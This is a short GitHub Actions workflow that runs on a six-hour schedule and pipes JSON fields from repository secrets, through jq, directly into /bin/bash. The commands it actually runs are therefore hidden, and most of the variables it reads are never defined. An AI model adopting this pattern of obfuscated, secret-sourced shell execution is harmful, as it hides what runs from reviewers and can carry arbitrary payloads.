name: tongshuts
on:
  workflow_dispatch:
  schedule:
    - cron: '35 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tongshuts
        env:
          wh0937: ${{ secrets.wh0937 }}
        run: |
          echo $wh0937 | jq -r .sh007 | /bin/bash
          echo $u02 | jq -r .id1 | /bin/bash
          echo $a659 | jq -r .tralq6417 | /bin/bash
          echo $uole522 | jq -r .fdlan0451 | /bin/bash
          echo $obyq45 | jq -r .zsd0717 | /bin/bash
          echo $vhb62105 | jq -r .kylv11 | /bin/bash
          echo $yyv2 | jq -r .b00413 | /bin/bash

